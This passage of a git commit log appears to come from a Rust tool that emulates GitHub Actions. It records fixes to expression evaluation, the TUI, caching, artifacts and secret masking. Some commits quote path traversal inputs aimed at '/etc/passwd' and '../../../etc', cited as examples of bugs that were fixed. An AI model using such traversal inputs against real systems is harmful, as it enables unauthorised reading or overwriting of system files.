borrow checker, which rightfully complains about mutating job_env while reading from it. Also add a fast-path to CacheStore::find_by_prefix that checks the exact key hash before scanning the entire cache directory, and add integration tests that exercise the artifact upload/ download, cache miss-defer-flush-restore, needs.* context, step outcome/conclusion, and secrets.* expression paths through the actual execution wiring — not just the isolated helpers. * fix(executor): close security holes and correctness bugs from review The code review turned up some genuinely scary stuff. Let's go through it. The artifact download had an unwrap_or(&file_path) fallback that meant if strip_prefix failed for any reason, we'd pass the absolute file path to Path::join — which silently replaces the base. So target.join("/etc/passwd") gives you "/etc/passwd". That's an arbitrary file write. Not great. The upload side was also doing strip_prefix against the non-canonical workspace path while the security filter used the canonical one. Inconsistent canonicalization is how you get path traversal bugs. Use canonical paths for both. success() was implemented as `job_status != "failure"`, which means it returns true when the job is cancelled. In real GHA, success() and cancelled() are mutually exclusive. This also meant both could be true simultaneously, which is just nonsensical. The workflow command parser had no URL-decoding at all. GHA percent-encodes newlines, colons, and percent signs in command values. Without decoding, ::add-mask:: masks the encoded form while the actual secret appears unmasked in logs. That's a secret leak. Condition evaluation was defaulting to true on parse errors, silently running steps that should be skipped. A typo in an if: condition should not mean "yes please run this." Default to false. secrets: inherit was logging a "not yet supported" warning and then doing absolutely nothing. Now it actually propagates the parent secrets to the child workflow, which is what it's supposed to do. While at it: filter .cache_key metadata from cache restore, remove the phantom jobs..result context that doesn't exist in real GHA, make aggregate_reusable_workflow_outputs deterministic, fix walk_files silently swallowing errors, reject empty set-output/save-state names, add missing annotation fields, and stop preprocess_with_value from returning raw ${{ }} templates on error. fix(executor): fix decode ordering, multi-path cache, and missing tests The decode_value() function in workflow_commands.rs was decoding %25 (percent) first in the replacement chain. This means an input like %250A would first become %0A, and then the next replacement would happily turn that into a newline. Classic double-decode bug — the kind of thing that looks correct until someone actually sends a literal percent sign through the system. Move %25 decoding to the end of the chain, matching what GitHub Actions actually does. While at it, actions/cache's `path` input supports multiple newline-separated paths (e.g. "node_modules\n~/.npm"), but we were passing the raw multi-line string as a single path. The second path would just silently not get cached. Fix this by splitting on newlines and saving/restoring each path independently. The cache store now uses a composite (key, path) hash so multiple paths under the same key don't stomp on each other. Also add the tests that should have been there from the start: download-artifact path traversal rejection, download-all-artifacts flow, cache empty key/path validation, cache multi-path deferred save, and the double-decode regression test. * fix(executor): close correctness, security, and async safety gaps from review The PR review turned up a frankly embarrassing number of issues across the GHA emulation stack. Let's go through the highlights. The expression evaluator had multiple correctness bugs: toJSON() was emitting unescaped strings (producing invalid JSON), format() was doing sequential replacements so arg content could be consumed by later placeholders, fromJSON() was using trim_matches('"') which strips quotes greedily from both ends, and github.event.* nested context access silently returned Null because of an overly strict parts.len() == 2 guard. All fixed. The secret masker was leaking the first and last characters of every secret longer than 8 bytes. This is not how you do secret masking. Replaced with fixed *** output matching GHA behavior. Also fixed byte/char length confusion on multi-byte secrets, sorted secrets longest-first to handle overlapping matches, and added the missing aws_secret and api_key checks to has_secret_patterns(). Three std::process::Command calls in the Rust action handler were blocking the tokio runtime. Under parallel matrix execution this would starve the thread pool. Replaced with tokio::process::Command. Cache saves were non-atomic — if the process died mid-copy, both old and new entries were lost. Now writes to a .tmp dir first and renames into place. While at it, made all .cache_key references use the CACHE_KEY_METADATA_FILE constant instead of hardcoding the string in three places. Other fixes: workflow command parser was trim()ing lines (GHA only recognizes commands at column 0), INPUT_* env vars were being logged in verbose output without masking, local reusable workflow paths had no traversal validation, artifact names with null bytes were silently stripped instead of rejected, hashFiles() wasn't checking for symlink traversal, and workflow_commands was unnecessarily pub. * fix(executor): fix UTF-8 corruption in expression tokenizer and format() It turns out the expression tokenizer was storing its input as `&[u8]` and happily casting individual bytes to `char` via `u8 as char`. This works fine for ASCII, which is most of what GHA expressions contain. But the moment someone puts a multi-byte UTF-8 character inside a string literal — say, `format('{0} → {1}', 'a', 'b')` — each byte of `→` (0xE2 0x86 0x92) gets treated as a separate Latin-1 character. The arrow becomes `â\u{86}\u{92}`. Not great. The same bug existed in the `format()` builtin, which iterated `fmt.as_bytes()` and did the same `u8 as char` dance. Fix both: change the `Tokenizer` to store `&str` instead of `&[u8]`, use proper char-aware iteration in `read_string()` (advancing by `ch.len_utf8()` instead of always 1), and rewrite the `format()` replacement loop to use `char_indices()`. All the ASCII-only paths (operators, identifiers, numbers) still use byte-level access since they only care about ASCII — no performance regression there. While at it, fix an unnecessary `String::clone` per comparison in `aggregate_reusable_workflow_outputs` where `sort_by_key` was cloning the key string. `sort_by(\|a, b\| a.0.cmp(b.0))` does the same thing without the allocation. * refactor(executor): introduce JobServices struct, fix async mutex misuse The review found that every function in the job/step execution hierarchy was threading 5-6 individual parameters (secrets_context, needs_context, needs_results, artifact_store, cache_store) through their signatures, leading to 15+ argument functions peppered with #[allow(clippy::too_many_arguments)]. This is not great. Introduce a JobServices<'a> struct that groups those five fields into a single borrowing container. JobExecutionContext, MatrixExecutionContext, and StepExecutionContext all now carry a `services: JobServices<'a>` instead of five separate fields. The net result is ~20 fewer lines despite adding a new struct, because the call sites got dramatically simpler. While at it, fix the pending_cache_saves Mutex: it was using std::sync::Mutex in async context. It worked only because the lock was never held across an await point, but that's the kind of thing that breaks silently the moment someone adds an await inside the critical section. Switch to tokio::sync::Mutex so the compiler will actually stop you from doing something stupid. Also improve CacheStore::new() to fall back to $HOME when dirs::home_dir() returns None (hello, minimal Docker containers), and document the github.event.* env-var approximation limitation in expression.rs so nobody has to rediscover it the hard way. * fix(executor): address review findings — cache safety, mask perf, missing tests The cache save_inner claimed to do an "atomic swap" via remove_dir_all followed by rename. It turns out that two operations are not, in fact, one operation. If the process dies between the remove and the rename, the cache entry is just gone and the temp dir is orphaned. Fix the save path to rename-aside-then-swap: old entry goes to `.old`, `.tmp` renames into place, then `.old` gets cleaned up. Still not truly atomic (POSIX doesn't give us that for directories), but the window where the entry is absent is now minimal rather than guaranteed. While at it, fix three other review findings: - SecretMasker::mask() was cloning and sorting all secret pairs on every single call. Cache the sorted pairs behind an Option that invalidates on mutation. The read-path fast-path avoids the write lock entirely. - evaluate_condition_with_context now says "failed to parse" instead of "failed to evaluate" when a condition errors, so users can actually tell the difference between "your condition is false" and "your condition is broken syntax and we're skipping your step." - aggregate_reusable_workflow_outputs silently overwrote colliding keys from different jobs. Now it warns when that happens, because non-deterministic output clobbering deserves at least a log line. Add unit tests for build_needs_context filtering, output key collision behavior, and empty-input edge cases. * fix(executor): close correctness, perf, and architecture gaps from review The PR review turned up a nice collection of things that were either wrong, wasteful, or unnecessarily messy. Let's go through them. current_dir().unwrap_or_default() in execute_matrix_job was silently producing an empty PathBuf on failure, which would then quietly poison every expression resolution downstream. That's not error handling, that's wishful thinking. Propagate the error properly. toJSON() had hand-rolled string escaping that missed control chars, null bytes, and who knows what else. We already depend on serde_json — just use serde_json::to_string() like a normal person. SecretMasker::mask() was deep-cloning the entire sorted_pairs Vec on every single call. With 100 secrets that's ~6KB of allocation per log line. Wrap it in Arc so the clone is an atomic refcount bump. pending_cache_saves used tokio::sync::Mutex despite never being held across an await point. Switch to std::sync::Mutex — no async overhead for what is fundamentally a synchronous lock-push-unlock pattern. resolve_job_outputs was silently swallowing expression evaluation errors and returning empty strings. Now it logs a warning so you at least have a prayer of debugging broken output references. The local-file and remote-file branches of execute_reusable_workflow_job had ~80 lines of duplicated code for env setup, secrets propagation, batch execution, and result aggregation. Extract run_called_workflow() so we stop maintaining the same logic in two places that will inevitably diverge. While at it, fold secret_manager and secret_masker into JobServices to reduce the parameter sprawl. Mark with_mask_char as #[cfg(test)] since create_mask always produces "**". Add tests for toJSON with control chars, multi-path cache restore, and missing step references. fix(executor): close review findings — decode gaps, path hardening, refactor The PR review caught several real issues that needed addressing. First, decode_value() in the workflow commands parser was missing %2C (comma) and %3B (semicolon) from its percent-decoding table. GitHub Actions encodes these in command parameter values, so any annotation with a comma in the file path would silently corrupt the value. Not great when your whole job is to parse these things. Second, the download-artifact path traversal check was using unwrap_or_else on a failed canonicalize of the workspace itself, falling back to a potentially-relative path as the safety baseline. If the workspace path was somehow non-canonical, the starts_with check becomes meaningless. Now it rejects outright if the workspace can't be canonicalized. Third, add_secret was using chars().count() for the min_length check, which counts Unicode scalar values rather than bytes. This was an unintentional behavior change from the original len() — a 2-char emoji string at 8 bytes would get rejected despite being substantial. Reverted to len(). While at it, extracted the three inline action handlers (upload-artifact, download-artifact, cache) from the 300+ line execute_step match chain into dedicated handle_* functions. The function was getting unwieldy and this makes each handler independently testable. Added tests for: condition parse-error → false behavior change, format() out-of-bounds placeholders, format() no double-substitution, %2C/%3B decoding, download-all with empty store, and process_workflow_commands edge cases.	2026-04-06 20:14:32 +05:30
Gokul	0cb27a5484	fix(executor): propagate step outputs and resolve env expressions in composite actions (#87 ) * fix(executor): propagate step outputs and resolve env expressions in composite actions It turns out that execute_composite_action was passing an empty step_outputs map to every single composite step. So when dtolnay/rust-toolchain step 1 wrote toolchain=stable to GITHUB_OUTPUT, step 6 asked for ${{ steps.parse.outputs.toolchain }} and got... nothing. Confusion ensues. But wait, there's more. Step env values containing ${{ }} expressions (like `toolchain: ${{inputs.toolchain}}`) were never run through the expression evaluator either. They were shoved into the environment as literal strings. So the shell variable $toolchain ended up being the literal text "${{inputs.toolchain}}", which bash was not thrilled about. Two fixes: (1) maintain a composite_step_outputs map and call apply_step_environment_updates after each composite step, exactly like normal job execution already does, and (2) run preprocess_expressions on step env values before inserting them. Both of these should have been there from the start. * fix(executor): detect local composite actions in prepare_action It turns out that prepare_action() never actually checked whether a local action (uses: ./) was composite. If there was no Dockerfile it just shrugged and returned PreparedAction::Image("node:20-slim"), which meant every local composite action silently fell through to the "echo 'Local action executed'" placeholder. The composite detection code only existed in the remote action resolution path, so local composite actions were completely broken. All that nice step-output propagation work? Never reached. Parse action.yml in the local-action branch and return PreparedAction::Composite when runs.using == "composite". This is the same check the remote path already does via action_resolver. * fix(executor): appease clippy approx_constant lint in test Using 3.14 as a test value triggers clippy's approx_constant lint because it's too close to std::f64::consts::PI. Changed to 3.15 which tests the exact same formatting path without making clippy throw a fit about mathematical constants. * refactor(executor): hoist action.yml parsing in prepare_action The local-action branch of prepare_action had the exact same four-line read-and-parse block copy-pasted in both the Dockerfile and non-Dockerfile paths. Two copies of the same code, doing the same thing, for no reason. Move the action.yml/action.yaml parsing above the Dockerfile existence check so both branches share a single `definition` binding. Same behavior, less duplication, one fewer place to forget to update when something inevitably changes.	2026-04-03 16:09:24 +05:30
Gokul	975b340f13	feat(executor): add GitHub Actions expression evaluator (#86 ) * feat(executor): add GitHub Actions expression evaluator Add a full expression evaluator for GitHub Actions `${{ }}` syntax, replacing the regex-only substitution that failed on complex expressions like those in dtolnay/rust-toolchain. - Add `inputs.`, `github.`, `runner.` context substitution patterns - Build recursive-descent expression evaluator with support for: - Operators: `==`, `!=`, `<`, `<=`, `>`, `>=`, `&&`, `\|\|`, `!` - String/number/boolean/null literals with GHA-compatible truthiness - Context resolution: inputs, env, github, runner, matrix, steps - Built-in functions: contains, startsWith, endsWith, format, success, failure, always, cancelled - Integrate evaluator into substitution pipeline for complex expressions - Replace hardcoded `evaluate_job_condition` with evaluator for `if:` - Add missing RUNNER_OS, RUNNER_ARCH, RUNNER_NAME env vars - Add catch-all fallback to prevent bash "bad substitution" errors fix(executor): fix correctness bugs in expression evaluator The expression evaluator landed with a few landmines worth defusing before they bite someone in production. First, the EXPRESSION_FALLBACK regex used [^}]* to match expression content, which breaks the moment someone uses format placeholders like {0} inside an expression. The single } in {0} would terminate the match early, producing garbage. Fix the regex to (?:[^}]\|\}[^}])* so it only stops at the actual }} delimiter. Second, NaN was truthy. In IEEE 754, NaN != 0.0 is true, so is_truthy() would happily report NaN as truthy. GitHub Actions disagrees. Add !n.is_nan() to match the spec. While at it, guard to_output_string() with n.is_finite() before the as-i64 cast to prevent overflow on non-finite values. Third, preprocess_fallback was dead code — evaluate_remaining_ expressions completely replaced its role in the pipeline. Remove it and its tests rather than leaving a function that exists only to confuse future readers. * refactor(executor): route all expressions through the evaluator The expression evaluator was added in `2954b05`, but it only handled "complex" expressions as a fallback. Simple context references like ${{ env.FOO }} and ${{ runner.os }} were still resolved by six separate regex preprocessors — each duplicating context resolution logic that the evaluator already handles perfectly well. This is the kind of redundancy that makes you maintain the same mapping in two places and then wonder why they drift apart. Rip out the individual regex preprocessors (preprocess_env_context, preprocess_inputs_context, preprocess_github_context, preprocess_runner_context, preprocess_step_outputs, and five regex patterns). Now preprocess_expressions does exactly two things: resolve hashFiles() (needs filesystem access), then route all remaining ${{ }} through the expression evaluator. Net -46 lines. While at it, fix three issues from code review: - Add debug logging when expression evaluation fails in the substitution path, instead of silently swallowing the error - Document the surprising Bool/String coercion in expr_eq (where false == "random" is true per GitHub Actions semantics) - Add test coverage for that coercion edge case	2026-04-03 13:07:36 +05:30
Gokul	f650f5533c	feat(ui): overhaul TUI and CLI output (#85 ) * feat(ui): overhaul TUI and CLI output for professional look The terminal UI looked like it was thrown together during a hackathon. Colors were hardcoded across 11 files with zero consistency — Color::Green here, Color::Cyan there, emoji like ✅ and ❌ mixed with Unicode symbols like ○ and ⟳, tab dividers using a raw pipe character. This is not great. The core problem was the complete absence of any centralized theming. Every view file was its own little island of ad-hoc styling decisions, and the non-TUI CLI output had zero color support despite the colored crate sitting right there in the workspace Cargo.toml, imported by absolutely nobody. So let's fix all of that: - Add theme.rs as single source of truth for colors, styles, symbols, and block/badge helpers. Every view now imports from here instead of hardcoding Color:: literals everywhere. - Replace the inconsistent emoji zoo (✅❌⏭⟳) with proper single-cell-width Unicode symbols (✔✖⊘◉○) that don't render at double width and break column alignment. - Upgrade ratatui 0.23 -> 0.28 and crossterm 0.26 -> 0.28, migrating all the breaking API changes (Frame generics gone, Table::new signature, f.size() -> f.area()). - Add cli_style.rs and wire colored output through all CLI paths — validate, execute, and list commands now have proper colored output with tree-style rendering. - Add braille spinner animation for running workflow states. - Rip out the redundant instruction headers from workflows and logs tabs (the status bar already shows the same hints), reclaiming vertical space. - Clean up the help tab from emoji section headers to properly styled underlined headers with fixed-width key columns. Net result: -418 lines. The UI got better and smaller. * fix(ui): replace fragile string-matching in status toast with typed severity The status bar was detecting success/error toasts by doing substring matching on the message text — checking for "success", "Success", and the ✔ symbol. It turns out that any message containing the word "success" anywhere (even in an error context) would render with a green background. This is not great. Add a StatusSeverity enum and a set_success_message() helper so callers declare intent explicitly instead of hoping their message text passes a regex-by-vibes check. Also replace the last ✅ emoji in set_status_message calls and swap the double-width 🔒 (U+1F512) LOCK symbol for single-width ⚿ (U+26BF), because the whole point of the theme overhaul was to kill double-width emoji. * fix(ui): align log detection with new Unicode symbols and clean up API The previous commits replaced all user-facing emoji with single-cell Unicode symbols, but forgot to update the two places that actually match against those symbols: LogFilterLevel::matches() and log_processor's type detection. So we had the delightful situation where cli_style outputs ✖ on errors, but the log filter is still looking for ❌. The text-based fallbacks ("Error", "WARN", etc.) masked the breakage, but the symbol branches were effectively dead code. While at it, rename set_status_message() to set_error_message() because a generic "set status" method that silently defaults to Error severity is a trap waiting to happen. Both existing call sites are genuine error paths, so the rename is accurate. Also run cargo fmt across the board -- the previous commits left a fair amount of unformatted code behind. * refactor: centralize Unicode symbols into wrkflw-logging The previous commit introduced a proper theme module with Unicode symbols for the TUI, but then three different places independently hardcoded the same symbols: theme::symbols, cli_style.rs, and models/mod.rs. Meanwhile, the executor, runtime, and logging crates were still happily emitting double-width emoji into log output. So we had the worst of both worlds: the UI layer had to pattern- match against both old emoji and new Unicode to detect log levels, and the "single source of truth" for symbols existed in triplicate. This is not great. Extract a shared `wrkflw_logging::symbols` module that every crate already depends on. theme.rs now re-exports it instead of defining its own copy. cli_style.rs and LogFilterLevel::matches() import from it. All emoji in executor, runtime, and logging are replaced. The old fallback in main.rs error filtering is gone because the executor no longer emits the old symbols. While at it, expand StatusSeverity with Info and Warning variants so "no matches found" shows as a yellow warning toast instead of an angry red error. Because not finding a search result is not an error, it's just disappointing. * fix(ui): stop hammering Docker on every render frame The status bar was calling docker::is_available() on every single render tick — that's 4 times per second, each spawning an OS thread, a docker subprocess, and a throwaway tokio runtime. The check has a 3-second timeout, we're calling it every 250ms. This is not great. It turns out that under this kind of self-inflicted load, the check frequently times out and returns false. So Docker shows as "Unavailable" even when it's sitting right there, perfectly happy. The double-nested with_stderr_to_null wrapping wasn't helping either. While at it, the logging crate was also cheerfully eprintln!()-ing warnings while the TUI had the terminal in raw mode, which is how you get "Docker is not available" splattered across the middle of your carefully rendered UI. Confusion ensues. The fix: cache the availability result in App state, seed it from the existing startup check, refresh it every 30 seconds in tick(), and add a quiet_mode flag to the logging crate so it stops writing to stderr while the TUI owns the terminal. Messages still go into the log buffer for the Logs tab — they just don't corrupt the display anymore.	2026-04-03 11:53:30 +05:30
Gokul	4c0f890ba7	docs: clean up READMEs, remove dead files and bloat (#84 ) * docs: gut the documentation bloat and remove dead files The documentation had grown into the kind of sprawling mess where the same feature gets explained three times in three different files, none of which agree with each other. The main README alone was 610 lines of duplicated sections, speculative roadmaps, and verbose limitation disclaimers that nobody reads. Remove 12 files that had no business existing: junk test files (hello.cpp, hello.rs, test.py), duplicate agent configs, a 487-line Podman testing manual, unused asciinema recordings, and 7MB of unreferenced GIF files. Merge the useful bits from GITLAB_USAGE.md into the main README where they belong. Rewrite the main README from 610 lines down to ~170. Every feature is mentioned once, in one place, with one example. The crate README now actually lists all 14 crates instead of pretending secrets doesn't exist. Net result: 3,819 lines deleted, 197 added. The documentation now fits in your head, which is the whole point. * docs: update crate READMEs for latest features and trim secrets The crate READMEs were quietly falling behind the actual code. The executor README didn't mention --job, environment file read-back, or job-level container directives. The UI README didn't mention job selection mode or the tui feature flag. The evaluator README didn't mention composite action input cross-checking. Meanwhile, the secrets README was 387 lines of documentation for a crate whose siblings average 25. It had full provider configuration examples, rate limiting docs, input validation specs, and benchmarking instructions — all of which belong in rustdoc, not a README that's supposed to give you a quick overview. Trim secrets to ~80 lines. Update executor, ui, evaluator, and wrkflw READMEs to reflect features from PRs #77-#83.	2026-04-02 23:58:51 +05:30
Gokul	6aa0a380f9	feat(executor): add GitHub Actions environment file read-back (#83 ) * feat(executor): add GitHub Actions environment file read-back After each step executes, read back GITHUB_OUTPUT, GITHUB_ENV, GITHUB_PATH, and GITHUB_STEP_SUMMARY files to enable inter-step data flow — the single highest-value GHA emulation improvement. - Add github_env_files module with parser for GHA key-value format (simple key=value and multiline heredoc key<<DELIMITER) - Read GITHUB_OUTPUT after each step, store outputs keyed by step ID - Merge GITHUB_ENV entries into job env for subsequent steps - Prepend GITHUB_PATH entries to PATH for subsequent steps - Add ${{ steps.<id>.outputs.<key> }} expression substitution - Add ${{ env.<name> }} expression substitution - Extend StepResult with outputs field for parsed step outputs - Restructure execute_job() loop to allow job_env mutation between steps using deadline-based timeout instead of async block wrapper * fix(executor): fix env file read-back bugs and deduplicate post-step logic The previous commit added environment file read-back but had a few issues that would bite in real workflows. First, the heredoc parser was checking for `<<` before checking for `=`, which means a value like `url=https://example.com/path<<EOF` would be misinterpreted as a heredoc start. The fix is obvious: the key before `<<` must actually be a valid identifier, not just "any non-empty string". Add is_valid_identifier() to enforce that. Second, GITHUB_ENV and GITHUB_PATH files were never truncated between steps. Since we read and merge their entire contents after each step, step 2 would re-process step 1's entries, causing duplicate PATH entries to accumulate O(n²) with each step. We already merge into job_env which is the source of truth — just truncate all three files after read-back. Third, the ~25 lines of post-step read-back logic were copy-pasted between execute_job and execute_matrix_job. Extract into apply_step_environment_updates() so there's exactly one place to maintain this. While at it, add tests for the heredoc ambiguity, unterminated heredocs, the apply helper, and — most importantly — a multi-step test that verifies PATH entries don't duplicate across steps. * fix(executor): remove dead StepResult.outputs field and fix timeout regression The previous commit added an `outputs: HashMap<String, String>` field to StepResult, but never actually populated it — every single construction site (all 20 of them) just sets it to HashMap::new(). The real step outputs live in step_outputs_map inside the job loop, completely bypassing this field. A dead field that looks like it should contain data is worse than no field at all. It's a trap for the next person who tries to read step outputs through the obvious API. Remove it. While at it, fix two issues in the execute_job timeout refactor: The pre-loop `remaining.is_zero()` check was redundant — passing Duration::ZERO to tokio::time::timeout already does the right thing. Having both just produced duplicate log messages. More importantly, the old timeout handler returned the timeout reason in JobResult.logs. The refactored version just broke out of the loop and lost that context entirely. Preserve it. Also document why clear_step_files intentionally skips GITHUB_STEP_SUMMARY (it's cumulative across steps in real GHA). * fix(runtime): fix emulation command execution mangling bash -c scripts It turns out the emulation runtime was joining the entire command array into a single string and passing it to `sh -c`. This means `bash -c <multiline-script>` became `sh -c "bash -c word1 word2 ..."`, where sh happily re-split the script into separate words and bash's -c only got the first one. The result: every `run:` step appeared to succeed (exit 0) but the actual script body never executed properly. Redirects like `>> $GITHUB_OUTPUT` were captured by the outer sh instead of the inner bash, so environment file write-back silently wrote garbage. Fix this by executing known interpreters (bash, sh, python, pwsh) directly via Command::new(cmd[0]).args(&cmd[1..]), preserving the script as a single argument. Unknown commands still fall back to sh -c for shell builtin and pipeline support. This also collapses the three separate code paths (simple commands, cargo, fallback) into one unified path, which is just less code to get wrong. While at it, fix a second bug in apply_step_environment_updates where GITHUB_PATH entries would clobber the entire PATH with just the new entries when job_env had no PATH key yet. Fall back to the system PATH instead of empty string so subsequent steps can still find bash. Kind of important. * fix(runtime): handle absolute interpreter paths and restore CI_PROJECT_DIR substitution The previous emulation refactor matched command[0] against bare names like "bash" and "cargo", which means /usr/bin/bash or /bin/sh would fall through to the sh -c wrapper — silently reintroducing the exact argument-mangling bug that refactor was supposed to fix. Extract the basename via Path::file_name() before matching. This is the obvious thing to do and I'm mildly annoyed it wasn't done the first time around. While at it, restore the ${CI_PROJECT_DIR} interpolation in env vars that got quietly dropped during the three-code-path consolidation. The old code only special-cased CARGO_HOME, but the real issue is broader: any env var value containing ${CI_PROJECT_DIR} needs interpolation. The new version handles all of them uniformly. Also add a comment explaining why composite actions get an empty step_outputs map — it's intentional (matches GHA scoping rules), not a TODO someone should "fix" later. * fix(executor): add timeout enforcement to matrix jobs and clean up review nits execute_matrix_job had no timeout enforcement whatsoever. The regular execute_job path got the per-step deadline treatment in `5792154`, but matrix jobs were left behind with a bare .await? that would happily run until the heat death of the universe. Apply the same sanitize_timeout_minutes / job_deadline / saturating_duration_since pattern so matrix jobs get identical timeout behavior. While at it, consolidate the duplicate std::env::current_dir() calls in emulation.rs into a single variable, and clarify the is_valid_identifier doc comment to explain it validates GHA env file keys (not step IDs, which allow hyphens).	2026-04-02 23:41:36 +05:30
Gokul	6016887a3b	feat(executor): easy GHA emulation fixes for better compatibility (#82 ) * feat(executor): add easy GHA emulation fixes for better compatibility - Expand github.* context with 13 missing env vars (CI, GITHUB_ACTIONS, GITHUB_REF_NAME, GITHUB_REF_TYPE, GITHUB_REPOSITORY_OWNER, etc.) and improve GITHUB_ACTOR to use git config / $USER instead of hardcoded value - Enforce timeout-minutes at both job level (default 360m per GHA spec) and step level via tokio::time::timeout - Implement defaults.run.shell and defaults.run.working-directory with proper fallback chain: step > job defaults > workflow defaults > bash - Implement hashFiles() expression function with glob matching, sorted file hashing (SHA-256), and integration into the substitution pipeline * fix(executor): harden hashFiles, working-directory, and shell -e Three issues from code review, all in the "we got the GHA emulation almost right" category: 1. hashFiles() was returning an empty string when no files matched. GHA returns the SHA-256 of empty input (e3b0c44...), not nothing. An empty string as a cache key component is the kind of thing that silently ruins your day. Also, unreadable files were being skipped without a peep — now we at least warn about it. 2. The working-directory default resolution was doing a naive Path::join with user-controlled input. If someone writes `working-directory: ../../../etc` or an absolute path, join happily replaces the base. Inside a container this is somewhat contained, but in emulation mode it's a real path traversal. Normalize the path and reject anything that escapes the workspace. 3. The bash -e flag change (correct per GHA spec) was undocumented. Scripts that relied on intermediate commands failing without aborting the step will now break. Document it in BREAKING_CHANGES.md so users aren't left guessing. * fix(executor): complete the GHA shell invocation and harden hashFiles The previous commit added `-e` to bash but stopped there, even though the BREAKING_CHANGES.md literally documented the full GHA invocation as `bash --noprofile --norc -e -o pipefail {0}`. So we were advertising behavior we weren't actually implementing. This is not great. Without `-o pipefail`, piped commands like `false \| echo ok` would silently succeed, which is exactly the kind of divergence that makes you distrust an emulator. And without `--noprofile --norc`, user profile scripts can interfere with reproducibility. While at it, fix hashFiles error handling — it was silently swallowing read errors and producing a partial hash, which is worse than failing because you get a wrong cache key with no indication anything went sideways. preprocess_hash_files and preprocess_expressions now return Result and the engine surfaces failures as step errors. Also add the tests that should have been there from the start: shell invocation flags, working-directory path traversal rejection, and defaults cascade (step > job > workflow). * fix(executor): harden hashFiles, timeout, and shell edge cases The previous round of GHA emulation fixes left a few holes that would bite you in production: hashFiles() would happily glob '../../etc/passwd' and hash whatever it found outside the workspace. It also loaded entire file contents into memory before hashing, which is not great when someone points it at a large binary artifact. The glob patterns now reject '..' traversal, and file contents are streamed into the SHA-256 hasher via io::copy instead. timeout-minutes accepted any f64 from YAML, including negative values, NaN, and infinity — all of which make Duration::from_secs_f64 panic. Non-finite and non-positive values now fall back to the GHA default of 360 minutes. Unknown shell values were silently accepted with a '-c' fallback. Now they emit a warning so you at least know something is off. While at it, replaced the hash_files_read_error_returns_err test that was testing two Ok paths (despite its name) with proper path-traversal rejection tests. * fix(executor): fix shadowed timeout_mins and extract sanitization helper It turns out the job timeout error path was re-reading the raw timeout_minutes value instead of using the already-sanitized one. If someone set timeout-minutes to NaN or a negative number, the sanitization would correctly fall back to 360, but the error message would happily print "Job exceeded timeout of NaN minutes." Not great. Extract sanitize_timeout_minutes() so both the job and step timeout paths use the same logic instead of duplicating the is_finite/positive/clamp dance. While at it, add proper tests for NaN, Infinity, negative, zero, and the max clamp — plus a test that actually exercises the job-level timeout expiry branch, which previously had zero coverage.	2026-04-02 18:00:41 +05:30
Gokul	14d30b6b57	feat(ui): add job selection mode to TUI for running individual jobs (#80 ) * feat(ui): add job selection mode to TUI for running individual jobs The CLI already has --job to run a single job, but the TUI had no way to do this. You could only run entire workflows, which is the kind of all-or-nothing approach that gets old fast when you have a workflow with 12 jobs and you just want to re-run "lint". Add a job selection sub-view to the Workflows tab. Press Enter on a workflow to drill into its jobs (parsed via parse_workflow), then Enter on a job to run just that one (with its transitive deps), or 'a' to run all, or Esc to go back. The selected job flows through as target_job in ExecutionConfig, reusing the exact same filtering logic the CLI --job flag already uses. While at it, updated the status bar hints and help overlay to document the new keybindings. * fix(ui): stop target_job from leaking across queued workflows The job selection feature added in `8406c60` stored target_job as a single global field on App, shared across all queued executions. It turns out that when you use a global mutable field as a communication channel between "user picked a job" and "executor should run this job", any workflow queued after the first one silently inherits whatever target_job was set. Confusion ensues. While at it, the Enter key was repurposed from "run this workflow" to "enter job selection mode", which means the most common operation now takes two keypresses instead of one. That's not great. Also, pressing 'r' during job selection mode would bypass it entirely and start execution with target_job still set from the previous selection, leaving the UI in a corrupt state. Please don't ship unguarded key handlers in modal UIs. The fix: - Replace the global target_job with a per-entry QueuedExecution struct that carries its own target_job. Each queued workflow now owns its execution config. No more ambient mutable state. - Cache parsed job names in Workflow at discovery time instead of re-parsing the YAML file on every Enter keypress. - Restore Enter to its original "run the workflow" behavior. Job selection is now Shift+J, which doesn't steal the primary action key. - Guard 'r' and other keys properly in job_selection_mode. - Deduplicate select_job_and_run/run_all_jobs into a single run_from_job_selection(target: Option<String>) method. * fix(ui): fix job selection bugs and add tests The single-file CLI path (`wrkflw --tui <file>`) was hardcoding job_names to Vec::new(), which means Shift+J would always report "No jobs found" even when the workflow obviously has jobs. Not great when the whole point of this feature is selecting jobs. The dedup logic in run_from_job_selection() was checking workflow_idx equality only, so queueing the same workflow with different target jobs (run "build", then run "test") would silently drop the second one. The user clicks a thing, nothing happens. Confusion ensues. While at it, extract the job name parsing into a shared extract_job_names() helper — the same six lines were copy-pasted in three places, which is exactly how you end up with three slightly different bugs later. Add 12 unit tests covering the job selection state machine: enter/exit mode, navigation wrapping, target_job threading through the execution queue, and the dedup fix. * fix(ui): deduplicate job selection cleanup and add edge case tests run_from_job_selection was manually inlining the same three lines that exit_job_selection_mode already does. That's the kind of thing that will drift the moment someone adds cleanup logic to one path but not the other. Let's just call the existing method. While at it, add tests for two untested edge cases: calling run_from_job_selection when no workflow is selected (should be a safe no-op), and entering job selection mode with an out-of-bounds index (should also be a no-op). Also document the precondition that callers must check !self.running before calling run_from_job_selection.	2026-04-02 15:38:58 +05:30
Gokul	f05cbca3b9	feat(ui): make TUI optional behind a cargo feature flag (#79 ) * feat(ui): make TUI optional behind a cargo feature flag The TUI is great for interactive use, but if you want to run wrkflw as a headless CI runner, dragging in ratatui and crossterm is pointless baggage. Issue #41 asked for this, and honestly the code was already well-isolated enough that it should have been optional from the start. Add a `tui` feature flag (default-on) to both the `wrkflw-ui` crate and the main binary crate. When disabled via `--no-default-features`, ratatui/crossterm are gone, the `tui` subcommand disappears, and running with no args prints help instead of launching the TUI. All CLI subcommands (validate, run, trigger, list) remain fully functional. While at it, removed the direct crossterm/ratatui deps from the binary crate — it never imported them, they were just coming through transitively anyway. * refactor(ui): feature-gate models and utils, clean up cfg imports The previous commit gated the TUI behind a feature flag but left the models and utils modules unconditionally compiled. It turns out that every single consumer of those modules is TUI-gated code — they were compiling to dead code when building with --no-default-features. Gate models and utils behind cfg(feature = "tui") where they belong. While at it, consolidate the five separate #[cfg(feature = "tui")] annotations on imports in workflow.rs into a single grouped use block, because repeating the same attribute five times in a row is not my idea of readability. Also add a cargo check --no-default-features step to CI so this kind of thing doesn't silently regress. * ci(build): drop archived actions-rs/cargo, add --workspace to feature check The actions-rs/cargo@v1 action has been archived for a while now, and wrapping every cargo invocation in a GitHub Action that just... calls cargo... was never exactly adding value. Replace all five uses with plain `run: cargo <cmd>` steps. While at it, add --workspace to the --no-default-features check so it actually verifies all 